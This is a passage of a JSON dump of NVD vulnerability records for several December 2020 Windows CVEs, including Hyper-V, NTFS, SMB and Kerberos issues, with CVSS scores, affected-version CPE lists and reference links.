"cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:19", "description": "Windows Overlay Filter Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17139", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17139"], "modified": "2021-03-03T21:17:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17139", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T14:35:21", "description": "Windows SMB Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17140", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17140", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T14:28:52", "description": "Kerberos Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16996", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996"], "modified": "2021-03-03T21:13:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-16996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16996", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:15", "description": "Windows Network Connections Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17092", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17092"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17092", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17092", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:20", "description": "Windows Digital Media Receiver Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17097", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17097"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", 
"cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17097", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17097", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:18", "description": "Windows NTFS Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17096", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17096"], "modified": "2021-03-04T18:26:00", "cpe": ["cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-17096", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17096", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:21", "description": "Windows GDI+ Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17098", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17098"], "modified": "2021-03-03T21:07:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:sp1", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17098", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_7:sp1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-03-23T14:34:18", "description": "Hyper-V Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-17095", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17095"], "modified": "2021-03-03T21:09:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", 
"cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-17095", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17095", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", 